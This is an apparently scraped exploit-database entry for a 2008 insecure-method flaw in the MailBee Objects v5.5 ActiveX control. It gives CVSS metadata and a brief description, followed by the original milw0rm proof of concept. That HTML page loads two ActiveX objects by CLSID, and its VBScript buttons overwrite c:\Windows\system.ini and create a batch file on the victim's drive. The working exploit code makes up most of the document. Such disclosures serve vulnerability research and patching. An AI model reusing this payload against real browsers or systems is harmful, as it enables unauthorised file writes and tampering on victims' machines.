header-logo
Suggest Exploit
vendor:
MailBee Objects
by:
darkl0rd
7.5
CVSS
HIGH
Insecure Method
20
CWE
Product Name: MailBee Objects
Affected Version From: v5.5
Affected Version To: v5.5
Patch Exists: YES
Related CWE: N/A
CPE: a:afterlogic:mailbee_objects
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Professional SP2
2008

MailBee Objects v5.5 (MailBee.dll) Insecure Method

A vulnerability exists in MailBee Objects v5.5 (MailBee.dll) which allows an attacker to save files to the system and create files on the system. This is due to the application not properly validating user-supplied input before using it to execute system commands. An attacker can exploit this vulnerability to save files to the system and create files on the system.

Mitigation:

Upgrade to the latest version of MailBee Objects v5.5 (MailBee.dll)
Source

Exploit-DB raw data:

<body bgcolor="#000000">

<div align="center">

<pre><code><span style="font: 10pt verdana;"><font color="#00FF00">=======================================================================</font>
</div><center>
 <font face="Verdana" color="#00FF00"><b>MailBee Objects v5.5 (MailBee.dll) Insecure Method</b><br>
 Web site : <a href="http://www.afterlogic.com/"><font color="#00FF00">http://www.afterlogic.com/</font></a></font><br><font face="Verdana" color="#00FF00">
=======================================================================</font><font face="Verdana" color="#00FF00">
 </font></span><font color="#00FF00"><br><span style="font-style:normal; font-variant:normal; font-size:10pt; font-family:Verdana; font-weight:700">Author: darkl0rd
 <br>E-mail: l_l_darkl0rd_l_l@yahoo.com</span></font><br><font color="#00FF00"><span style="font-style:normal; font-variant:normal; font-weight:normal; font-size:10pt; font-family:Verdana">
 Tested on Windows XP Professional SP2 , with Internet Explorer 6
</span></font></center>

<div align="left"><font color="#00FF00"><object classid='clsid:0A83F9E1-A8DD-459F-B98F-24295345AFA8' id='los'></object></font>
<object classid='clsid:4D007FEC-23CA-4DEF-869A-8776FAE266DB' id='over'></object>
</div><div align="center"><br><font color="#00FF00" face="Verdana">Save Files</font>
</div><center><span style="font: 10pt verdana;"><input language=VBScript onclick=evil() type=button value="Exploit [1]"></span>&nbsp;<font face="verdana" size="2" color="#00FF00"><br>Creat Files</font></center>
<center><input language=VBScript onclick=nice() type=button value='Exploit [2]'></center>
d'/<script language='vbscript'>
 Sub evil
   los.SaveToDisk ("c:\Windows\"),"system.ini"
   MyMsg = MsgBox("Exploit completed!")
 End Sub
 Sub nice
   mystr="start"
   over.AddStringToFile "c:\darkl0rd.bat" ,mystr
   MyMsg = MsgBox("Exploit completed!")
  End Sub
</script>
</span></code></pre>

# milw0rm.com [2008-01-28]